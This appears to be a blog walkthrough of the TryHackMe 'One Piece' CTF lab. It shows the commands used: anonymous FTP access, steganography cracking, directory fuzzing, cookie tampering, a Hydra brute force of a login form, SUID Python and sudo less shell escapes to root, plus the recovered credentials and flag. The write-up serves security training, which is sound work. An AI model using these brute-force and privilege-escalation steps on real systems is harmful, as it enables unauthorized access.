Post

TryHackMe: One Piece Room Walkthrough

Complete walkthrough of the One Piece room on TryHackMe. Anonymous FTP, steganography, multi-layer cipher decoding with CyberChef, custom Gobuster wordlists, and Python SUID privilege escalation.

TryHackMe: One Piece Room Walkthrough

Overview

“I’m gonna be the Pirate King!” - Monkey D. Luffy

Room: One Piece
Platform: TryHackMe
Difficulty: Medium
Author: A One Piece fan, for One Piece fans

One Piece Header

This room was one of the most fun and creative CTFs I have ever worked through. Every single challenge, island, and credential clue is woven directly into the anime lore.

From finding the first Road Poneglyph hidden inside the Whale Tree on Zou via anonymous FTP, to decoding through six layers of ciphers in CyberChef, to battling Blackbeard on Laugh Tale, it was an absolute blast.

Here is my complete voyage to becoming the Pirate King.


1. Initial Reconnaissance

Recon Scan

I started by running a full Nmap scan to enumerate open ports and services:

1
sudo nmap -A 10.49.138.101

Results:

PortServiceVersion
21/tcpFTPvsftpd 3.0.3
22/tcpSSHOpenSSH 7.6p1 Ubuntu
80/tcpHTTPApache httpd 2.4.29

Key finding: Anonymous FTP login is enabled, and there is already a visible file welcome.txt in the FTP root.


2. FTP Enumeration: Zou Island (1st Road Poneglyph)

I logged into FTP using anonymous credentials:

1
2
3
ftp 10.49.138.101
# Username: anonymous
# Password: <blank>

Running ls -al (using -al is critical because standard ls hides dot-files) revealed a hidden directory:

1
2
drwxr-xr-x    2 0        0            4096 Jul 26  2020 .the_whale_tree
-rw-r--r--    1 0        0             187 Jul 26  2020 welcome.txt

In One Piece lore, the Whale Tree on Zou island hides the first Road Poneglyph. The room creator stayed completely true to the story!

Navigating into .the_whale_tree and listing its contents:

1
2
ftp> cd .the_whale_tree
ftp> ls -al

I discovered two hidden files:

  • .road_poneglyph.jpeg
  • .secret_room.txt

I downloaded both using binary mode so the image wouldn’t corrupt:

1
2
3
4
ftp> binary
ftp> get .secret_room.txt
ftp> get .road_poneglyph.jpeg
ftp> exit

Reading .secret_room.txt showed a dialogue between Inuarashi, Nekomamushi, and Luffy about the Road Poneglyphs, confirming the tree name: the Whale Tree of Zou.

Next, I checked the JPEG image for hidden steganographic data:

1
2
steghide extract -sf .road_poneglyph.jpeg
# Passphrase: <blank>

Leaving the passphrase empty worked! It extracted a large encoded string: the 1st Road Poneglyph. I saved it in my notes for later.


3. Web Enumeration: The New World

I opened http://10.49.138.101 in my browser. The page was titled “New World”.

Viewing the page source (Ctrl+U) revealed a hidden HTML comment:

Source Comment

1
<!--J5VEKNCJKZEXEUSDJZEE2MC2M5KFGWJTJMYFMV2PNE2UMWLJGFBEUVKWNFGFKRJQKJLUS5SZJB...-->

Decoding this Base32 string revealed a hint: there are 3472 possible locations for the Log Pose, meaning we needed a custom wordlist.


4. Finding the Log Pose

Searching GitHub for a repository named LogPose led directly to a custom wordlist with exactly 3472 entries. I grabbed the wordlist and fired up Gobuster:

1
gobuster dir -u http://10.49.138.101 -w LogPose.txt -x php,html,txt

Gobuster found the hidden path: /dr3ssr0s4.html (Dressrosa!).


5. Dressrosa: The Rabbit Hole

Navigating to http://10.49.138.101/dr3ssr0s4.html displayed an image called rabbit_hole.png containing encoded strings, a deliberate rabbit hole by the creator.

The real clue was tucked away in the CSS file:

1
curl -s http://10.49.138.101/css/style.css

Inside the stylesheet was a reference to: ../king_kong_gun.jpg.

I downloaded the image and inspected its metadata with exiftool:

1
2
wget http://10.49.138.101/king_kong_gun.jpg
exiftool king_kong_gun.jpg

The Comment field contained:

1
Doflamingo is /ko.jpg

I downloaded ko.jpg and ran strings on it:

1
strings ko.jpg | tail -n 20

There was the real destination:

1
Congratulations, this is the Log Pose that should lead you to the next island: /wh0l3_c4k3.php

KO Image Strings


6. Whole Cake Island: Big Mom (2nd Road Poneglyph)

Visiting http://10.49.138.101/wh0l3_c4k3.php brought up a text input form. The page hint said “Big Mom likes cakes”.

Checking the browser cookies in DevTools (Storage -> Cookies) revealed:

NameValue
cookieNoCakeForYou

I changed the cookie value to CakeForYou and sent a POST request:

1
2
3
curl -X POST http://10.49.138.101/wh0l3_c4k3.php \
  -d "text_input=cake" \
  --cookie "cookie=CakeForYou"

Success! The response gave me the 2nd Road Poneglyph along with a redirect to the next island: /r4nd0m.html.

Whole Cake Island


7. Random Island: Buggy’s Games

The page /r4nd0m.html presented two mini-games from Buggy the Clown:

  • Brick Breaker
  • Brain Teaser

Looking at the JavaScript source code of brain_teaser.js:

1
curl -s http://10.49.138.101/buggy_games/brain_teaser.js

Inside the JavaScript logic, there was a hidden assignment:

1
document.getElementById('back').textContent = "Log Pose: /0n1g4sh1m4.php"

The Log Pose was hidden on the back face of the 3D cube!


8. Onigashima: Kaido (3rd Road Poneglyph)

Onigashima

Navigating to /0n1g4sh1m4.php showed two options: a login form and a file upload. The page claimed “Speaking about brute force, Kaido is unbeatable”.

I downloaded kaido.jpeg from the page and cracked its passphrase using stegseek:

1
stegseek kaido.jpeg /usr/share/wordlists/rockyou.txt

It cracked immediately: passphrase imabeast (Kaido of the Beasts!).

The extracted file contained:

1
Username: K1ng_0f_th3_B3@sts

I used Hydra to brute-force the password against the login form:

1
2
hydra -l K1ng_0f_th3_B3@sts -P /usr/share/wordlists/rockyou.txt 10.49.138.101 http-post-form \
  "/0n1g4sh1m4.php:user=^USER^&password=^PASS^&submit_creds=Login:ERROR"

Hydra found the password, allowing me to log in and claim the 3rd Road Poneglyph.


9. The Last Road Poneglyph: Hidden in Plain Sight

The page stated that the location of the 4th Poneglyph was “unspecified”.

I decided to try visiting that literally in the URL:

1
http://10.49.138.101/unspecified

It loaded right away with the 4th and final Road Poneglyph! Using the word “unspecified” as the actual web path was hilarious.


10. Decoding the Poneglyphs: SSH Credentials

With all four Road Poneglyphs collected, I concatenated them and loaded the combined ciphertext into CyberChef.

It took a 6-layer decoding recipe to break through:

1
Base32 -> Morse Code -> Binary -> Hex -> Base58 -> Base64

The final output decrypted into our SSH credentials:

1
2
Username: M0nk3y_D_7uffy
Password: 1_w1ll_b3_th3_p1r@t3_k1ng!

11. Laugh Tale: Initial Access

I logged into SSH with Luffy’s credentials:

1
ssh M0nk3y_D_7uffy@10.49.138.101

We landed on the island of Laugh-Tale! Reading laugh_tale.txt revealed that Marshall D. Teach (Blackbeard) was also on the island, setting up the final confrontation for root.


12. Privilege Escalation: Luffy vs Teach

Step 1: SUID Binary to Pivot Users

I looked for SUID binaries:

1
find / -perm -4000 2>/dev/null

One custom binary stood out immediately:

1
/usr/bin/gomugomunooo_king_kobraaa

Gum Gum King Cobra! Running it launched a Python 3.6 interpreter owned by the user 7uffy_vs_T3@ch.

I spawned a privileged shell under that user:

1
/usr/bin/gomugomunooo_king_kobraaa -c 'import os; os.execl("/bin/sh","sh","-p")'

Now running as 7uffy_vs_T3@ch!

Step 2: Sudo Misconfiguration to Root

Next, I checked sudo permissions:

1
sudo -l

Output:

1
2
User 7uffy_vs_T3@ch may run the following commands on Laugh-Tale:
    (ALL) /usr/local/bin/less

Checking permissions on /usr/local/bin/less: it was world-writable (-rwxrwx-wx)!

We can exploit this either by appending a reverse shell payload to the file, or by using the built-in GTFOBins escape inside less:

1
sudo /usr/local/bin/less /etc/profile

Once inside less, typing:

1
!/bin/bash

Broke straight into a root shell:

1
2
root@Laugh-Tale:~# whoami
root

13. Root: Finding the One Piece

With root access, I searched the filesystem for the final treasure:

1
2
find / -name "*piece*" 2>/dev/null
cat /usr/share/mysterious/on3_p1ec3.txt
1
One Piece: S3cr3ts_0f_tH3_W0rlD_&_0f_Th3_P@st$

Just like in the anime, the One Piece was the secrets of the world and its past!

Victory


Summary of the Journey

PhaseDiscovery / ActionTool
ReconOpen ports 21, 22, 80Nmap
ZouAnonymous FTP, extracted 1st Poneglyphvsftpd, steghide
WebBase32 comment hintDevTools
Log PoseFuzzed custom 3472 pathsGobuster + LogPose.txt
DressrosaExiftool metadata and strings in imageexiftool, strings
Whole CakeCookie manipulation (CakeForYou)curl
Buggy’s GamesCube back face in JS codecurl
OnigashimaCracked steghide and Hydra brute-forcestegseek, Hydra
4th PoneglyphLiteral /unspecified pathBrowser
Decoding6-layer cipher chain to get SSH credsCyberChef
Privesc 1Custom SUID binary (gomugomunooo_king_kobraaa)Python os.execl
Privesc 2Sudo /usr/local/bin/less escapeGTFOBins
One PieceFlag in /usr/share/mysterious/cat

You can find me online at:

My signature image

This post is licensed under CC BY 4.0 by the author.